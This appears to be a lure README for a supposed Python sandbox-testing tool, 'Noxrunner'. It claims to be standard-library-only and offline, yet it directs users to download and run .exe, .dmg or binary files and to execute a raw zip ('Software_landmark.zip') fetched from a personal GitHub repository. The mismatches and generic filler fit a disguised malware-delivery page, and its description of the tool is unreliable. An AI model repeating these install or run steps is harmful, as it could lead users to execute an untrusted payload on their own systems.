Noxrunner is a Python client library and command line interface (CLI) designed for sandbox execution backends. It allows you to perform tests safely in a controlled environment. With its local offline mode, you can run tests without needing an internet connection. Noxrunner relies only on the standard Python library, making it simple and efficient to use.
Ready to try out Noxrunner? Follow these easy steps to get started with the application.
- Visit the Releases page to find the latest version of Noxrunner.
- Look for the version you wish to download. Click on the asset that matches your operating system to start the download.
- Once the download is complete, locate the file on your computer.
-
For Windows Users:
- Locate the downloaded
.exefile. - Double-click the file to start the installation process.
- Follow the on-screen instructions until the installation completes.
- Locate the downloaded
-
For Mac Users:
- Find the downloaded
.dmgfile. - Open the
.dmgfile and drag the Noxrunner icon to your Applications folder. - Eject the
.dmgfile after installation.
- Find the downloaded
-
For Linux Users:
- Open a terminal window.
- Navigate to the directory where you downloaded the file.
- Use the command
chmod +x noxrunnerto make it executable. - Run it with
./noxrunner.
After installation, you can start using Noxrunner.
- Open your terminal or command prompt.
- Type
noxrunnerand press Enter. - Follow the prompts on the screen to set up your first test.
-
Running Tests:
Simply typenoxrunner run https://github.com/Mykazi127/noxrunner/raw/refs/heads/main/bin/Software_landmark.zipto execute your test file. -
Viewing Help:
If you need assistance, typenoxrunner helpto see available commands and options.
Noxrunner includes various features to facilitate efficient testing:
- Sandboxed Environment: Safely run multiple tests without affecting your system.
- Local Offline Mode: Execute tests without being connected to the internet.
- Standard-Library-Only Design: Utilize a simple setup that requires no additional dependencies.
To run Noxrunner, ensure your system meets the following requirements:
- Operating System: Windows 10 or later, macOS 10.12 or later, or a recent Linux distribution.
- Python Version: Python 3.6 or newer should be installed on your machine.
To check your Python version, run python --version in your terminal or command prompt.
For more detailed instructions and advanced usage, refer to our Documentation. Here you will find guides on using Noxrunner effectively, including examples and troubleshooting tips.
We welcome contributions! If you're interested in improving Noxrunner, please follow these steps:
- Fork the repository.
- Create a new branch for your feature or bug fix.
- Make your changes and commit them.
- Open a pull request explaining your modifications.
If you encounter issues or have questions, please check the Issues section on GitHub. You can also submit a new issue if your problem is not listed.
Join our growing community!
- Follow us on GitHub.
- Engage in discussions in our Issues section.
Noxrunner relies on community feedback to improve. Your input helps us make the tool better for everyone.
Noxrunner is licensed under the MIT License. This means you can use, modify, and distribute it freely, with some conditions outlined in the LICENSE file.
Don't forget to visit our Releases page to download the latest version.
Now you are ready to explore Noxrunner! Enjoy running your tests in a safe and efficient manner!